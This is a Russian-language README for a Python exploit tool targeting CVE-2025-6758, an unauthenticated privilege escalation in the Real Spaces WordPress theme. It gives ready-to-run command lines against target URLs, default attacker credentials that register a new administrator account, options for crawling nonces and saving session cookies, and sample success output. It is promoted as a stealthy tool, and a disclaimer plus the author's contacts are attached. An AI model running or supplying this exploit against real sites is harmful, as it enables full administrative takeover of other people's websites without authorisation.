
Real Spaces — тема каталога недвижимости для WordPress <= 3.6 — неаутентифицированное повышение привилегий до администратора
imic_agent_registerCVE-2025-6758
Оценка CVSS: 9.8 (критическая)
Тема Real Spaces - WordPress Properties Directory Theme для WordPress уязвима к повышению привилегий через функцию imic_agent_register во всех версиях до 3.6 включительно.
Эта уязвимость возникает из-за недостаточных ограничений на назначение ролей при регистрации, что позволяет неавторизованным злоумышленникам произвольно указывать свою роль, включая Administrator, при регистрации нового пользователя.
Этот критический недостаток позволяет удалённым злоумышленникам получить полный административный доступ к сайтам WordPress, работающим на уязвимых версиях темы, что ставит под угрозу целостность и безопасность затронутой системы.
CVE-2025-6758.py — это профессиональный эксплойт и скрипт автоматизации, написанный на Python для демонстрации и использования этой уязвимости.
Скрипт предназначен для пентестеров и исследователей безопасности, обеспечивая автоматическое обнаружение, извлечение nonce и эксплуатацию в высоконадёжном, модульном и скрытном режиме.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username Задать собственное имя пользователя (по умолчанию: Nxploited)--password Задать собственный пароль (по умолчанию: 123456789)--email Задать собственный email (по умолчанию: [email protected])--position Задать собственную должность (по умолчанию: Nxploitedadmin)--role Задать роль пользователя (по умолчанию: administrator)--max-pages Максимальное количество страниц для обхода в поисках nonce (по умолчанию: 30)--max-depth Максимальная глубина обхода ссылок (по умолчанию: 2)--scan-common-paths Сканировать дополнительные пути регистрации/плагинов/тем--ajax-path Пользовательская конечная точка AJAX POST (по умолчанию: wp-admin/admin-ajax.php)--verify-ssl Включить проверку сертификатов SSL--cookie-save Путь для сохранения сессионных cookiepython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
При успешной эксплуатации скрипт выведет:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
Если эксплуатация не удалась или nonce не найден, будут показаны описательные сообщения об ошибках и подсказки для дальнейшего устранения неполадок.
Этот скрипт предназначен только для образовательных, исследовательских и авторизованных целей пентеста.
Любое неавторизованное использование против веб-сайтов или систем без явного письменного разрешения владельца строго запрещено и может быть незаконным.
Автор не несёт ответственности за неправомерное использование или ущерб, причинённый в результате использования этого скрипта.
📧 Эл. почта: [email protected]
📨 Telegram: @Kxploit
📡 Telegram-канал: @KNxploited
Автор: Nxploited ( Khaled Alenazi )
| Аргумент | Значение по умолчанию | Описание |
|---|
--username | Nxploited | Задать собственное имя пользователя для регистрации |
--password | 123456789 | Задать собственный пароль для регистрации |
--email | [email protected] | Задать собственный адрес электронной почты |
--position | Nxploitedadmin | Задать собственное значение должности |
--role | administrator | Задать роль при регистрации (для эксплуатации рекомендуется Administrator) |
--max-pages | 30 | Максимальное количество страниц для обхода в поисках nonce |
--max-depth | 2 | Максимальная глубина обхода ссылок |
--scan-common-paths | Нет | Дополнительное сканирование путей регистрации/плагинов/тем на nonce (только флаг) |
--ajax-path | wp-admin/admin-ajax.php | Пользовательская конечная точка AJAX POST |
--verify-ssl | Нет | Включить проверку сертификатов SSL (только флаг) |
--cookie-save | Нет | Путь для сохранения сессионных cookie (формат pickle) |
--save-json | Нет | Путь для сохранения результатов поиска nonce в формате JSON |
--debug | Нет | Включить отладочное логирование и вывод HTML/JS фрагментов (только флаг) |
--save-json Путь для сохранения результатов поиска nonce в формате JSON--debug Включить отладочное логирование и вывод HTML/JS фрагментов